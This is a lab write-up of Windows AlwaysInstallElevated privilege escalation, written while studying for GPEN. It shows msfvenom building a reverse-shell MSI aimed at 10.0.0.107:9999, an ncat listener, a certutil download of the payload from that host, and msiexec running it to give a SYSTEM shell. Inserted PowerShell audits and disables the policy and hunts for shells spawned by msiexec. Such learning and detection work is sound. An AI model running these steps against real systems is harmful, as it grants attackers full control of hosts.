Sunday, January 2, 2022

Beginning exploitation of AlwaysInstallElevated

The AlwaysInstallElevated policy, when enabled by an administrator, directs Windows Installer to install packages with system-level privileges.

Microsoft does not recommend enabling it today. However, it is something I'm learning more about as I pursue my GPEN.

To be able to leverage this facility, the AlwaysInstallElevated value needs to be set to 1 under both of these registry keys (one in the machine hive, one in the user hive):

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Checking to see if it is set under HKLM.

C:\>reg query HKLM\Software\Policies\Microsoft\Windows\Installer /s /f AlwaysInstallElevated
End of search: 0 match(es) found.

Nothing found under HKLM; checking HKCU.

C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer /s /f AlwaysInstallElevated
End of search: 0 match(es) found.

Nothing found. Now I'm going to add the values so that I can test the vulnerability.

C:\>reg ADD HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

C:\>reg ADD HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

Verifying the entries have been created.

C:\>reg query HKLM\Software\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1


C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
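The two `reg query` commands above are the manual version of a check that is worth scripting for every host you administer. The PowerShell below is an added example (not code from the original post); the function names `Get-AlwaysInstallElevatedStatus` and `Disable-AlwaysInstallElevated` are my own. It reads the value from both hives, reports whether the policy is actually effective (Microsoft's documentation requires the value to be 1 in both HKLM and HKCU), and can revert it to 0, which is the same state the Group Policy setting "Always install with elevated privileges" writes when set to Disabled.

```powershell
# Added example (not from the original post): audit the AlwaysInstallElevated
# policy on the local machine and optionally revert it to the safe state.
# The policy is only effective when the value is 1 under BOTH hives, which is
# exactly what the two reg ADD commands above produced.
function Get-AlwaysInstallElevatedStatus {
    [CmdletBinding()]
    param()

    $paths = [ordered]@{
        'HKLM' = 'Registry::HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer'
        'HKCU' = 'Registry::HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer'
    }

    $values = [ordered]@{}
    foreach ($hive in $paths.Keys) {
        # Get-ItemProperty returns $null if the key or the value is missing;
        # a missing value means the policy is "Not configured" for that hive.
        $item = Get-ItemProperty -Path $paths[$hive] -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
        $values[$hive] = if ($null -eq $item) { $null } else { [int]$item.AlwaysInstallElevated }
    }

    [pscustomobject]@{
        HKLM         = $values['HKLM']
        HKCU         = $values['HKCU']
        # Exploitable only when both hives carry a 1.
        Exploitable  = (($values['HKLM'] -eq 1) -and ($values['HKCU'] -eq 1))
        # One hive at 1 is not exploitable yet, but is a misconfiguration worth flagging.
        PartiallySet = (($values['HKLM'] -eq 1) -xor ($values['HKCU'] -eq 1))
    }
}

function Disable-AlwaysInstallElevated {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()

    $paths = @(
        'Registry::HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer',
        'Registry::HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer'
    )
    foreach ($path in $paths) {
        # A missing key already means "Not configured"; nothing to change there.
        if (-not (Test-Path -Path $path)) { continue }
        if ($PSCmdlet.ShouldProcess($path, 'Set AlwaysInstallElevated = 0')) {
            # 0 matches the GPO state "Disabled"; deleting the value instead would
            # return it to "Not configured".
            Set-ItemProperty -Path $path -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
        }
    }
}

# Usage:
#   Get-AlwaysInstallElevatedStatus
#   Disable-AlwaysInstallElevated -WhatIf   # preview the change
#   Disable-AlwaysInstallElevated           # HKLM requires an elevated prompt
```

Two things to keep in mind when using it: the HKCU check only sees the hive of the user running the script, so on a shared machine run it (or an equivalent GPO result query) for each interactive account, and a value written directly with `reg ADD` as in this post will be overwritten at the next policy refresh if a GPO manages the setting, so the durable fix is to set the policy to Disabled in both Computer Configuration and User Configuration under Administrative Templates > Windows Components > Windows Installer.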

With the two entries in place, time to create an MSI package via msfvenom.

┌──(root💀securitynik)-[~/Downloads]
└─# msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=10.0.0.107 LPORT=9999 --format msi --out malicious.msi --smallest
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: malicious.msi

Set up a listener on port 9999.

┌──(root💀securitynik)-[~/Downloads]
└─# ncat --verbose --listen 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999

Set up a web server to host the malicious file.

┌──(root💀securitynik)-[~/Downloads]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Before downloading the file, and since this is about privilege escalation, verify the privileges this user currently has.

C:\tmp>whoami
sec560student\sec560


C:\tmp>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes           
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192  

Note that BUILTIN\Administrators shows "Group used for deny only" and the token carries the Medium Mandatory Level label: this account is a local administrator running with a UAC-filtered token, not a plain standard user, although the installer path below works the same way for either. Downloading the file using certutil.

C:\tmp>certutil -URLCache -f http://10.0.0.107:80/malicious.msi malicious.msi
****  Online  ****
CertUtil: -URLCache command completed successfully.

Confirming the file was downloaded.

┌──(root💀securitynik)-[~/Downloads]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.110 - - [28/Nov/2021 19:12:25] "GET /malicious.msi HTTP/1.1" 200 -

Running the msiexec command.

C:\tmp>msiexec /quiet /qn /i malicious.msi

At this point the last command appears to have done nothing, because /quiet and /qn suppress all installer UI. Looking back at my ncat session, we see:

┌──(root💀securitynik)-[~/Downloads]
└─# ncat --verbose --listen 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999

Ncat: Connection from 10.0.0.110.
Ncat: Connection from 10.0.0.110:2283.
Microsoft Windows [Version 10.0.18363.1440]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>
C:\WINDOWS\system32>

Voila! We have a shell. Confirming the rights the shell now has.

C:\WINDOWS\system32>whoami                                                                                  
whoami                                                                                                      
nt authority\system 


C:\WINDOWS\system32>whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                            Attributes                                        
====================================== ================ ============================================================== ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                     
Everyone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                       Mandatory group, Enabled by default, Enabled group
NT SERVICE\msiserver                   Well-known group S-1-5-80-685333868-2237257676-1431965530-1907094206-2438021966 Enabled by default, Enabled group, Group owner    
LOCAL                                  Well-known group S-1-2-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                 Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner   
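The group list above is the defender's clue: the shell runs as NT AUTHORITY\SYSTEM and carries the NT SERVICE\msiserver group, so its parent is the Windows Installer service (msiexec.exe) rather than anything the user launched directly. That parent/child relationship is visible in Security event 4688 (process creation) whenever "Audit Process Creation" is enabled. The PowerShell below is an added example, not code from the original post; the function name `Find-MsiexecSpawnedShell` and the list of child images are my own choices. It hunts the local Security log for command interpreters and script hosts spawned by msiexec.exe and reports the account they run as.

```powershell
# Added example (not from the original post): hunt the local Security log for
# the tell-tale of an AlwaysInstallElevated abuse, a shell or script host
# spawned by msiexec.exe, as seen in the reverse shell above.
# Requires "Audit Process Creation" (event 4688); enabling command-line logging
# as well makes the CommandLine field useful instead of empty.
function Find-MsiexecSpawnedShell {
    [CmdletBinding()]
    param(
        [datetime]$StartTime = (Get-Date).AddDays(-7),
        # Child images that have no business being launched by the installer service.
        [string[]]$SuspiciousChildren = @('cmd.exe', 'powershell.exe', 'pwsh.exe',
                                          'wscript.exe', 'cscript.exe', 'mshta.exe', 'rundll32.exe')
    )

    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $StartTime } `
                           -ErrorAction SilentlyContinue

    foreach ($ev in $events) {
        # Read EventData by field name rather than positional index; the
        # positions differ between Windows versions, the names do not.
        $xml  = [xml]$ev.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        $parent = [System.IO.Path]::GetFileName($data['ParentProcessName'])
        $child  = [System.IO.Path]::GetFileName($data['NewProcessName'])

        if ($parent -ieq 'msiexec.exe' -and $SuspiciousChildren -contains $child) {
            # 4688 fills the Target* fields only when the new process runs under a
            # different account than its creator; otherwise they hold '-' and the
            # Subject* fields (the creator's account) apply. For a process spawned
            # by the installer service that account is SYSTEM, matching the
            # 'nt authority\system' whoami output in the post.
            $runsAs = if ($data['TargetUserName'] -and $data['TargetUserName'] -ne '-') {
                "$($data['TargetDomainName'])\$($data['TargetUserName'])"
            } else {
                "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            }

            [pscustomobject]@{
                Time        = $ev.TimeCreated
                Parent      = $data['ParentProcessName']
                Child       = $data['NewProcessName']
                RunsAs      = $runsAs
                CommandLine = $data['CommandLine']
            }
        }
    }
}

# Usage:
#   Find-MsiexecSpawnedShell | Format-Table -AutoSize
#   Find-MsiexecSpawnedShell -StartTime (Get-Date).AddHours(-1) -SuspiciousChildren 'cmd.exe'
```

Legitimate installers do run custom actions through msiexec.exe, so treat a hit as a lead rather than a verdict and look at the package name and the command line. The other half of this chain, the `reg ADD` of the AlwaysInstallElevated value, can be caught separately with Sysmon event 13 (registry value set) on the two Installer key paths shown earlier, or with Security event 4657 once a SACL is placed on those keys.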

That's it for this post!

References:
https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated
https://steflan-security.com/windows-privilege-escalation-alwaysinstallelevated-policy/
https://www.offensive-security.com/metasploit-unleashed/Msfvenom/

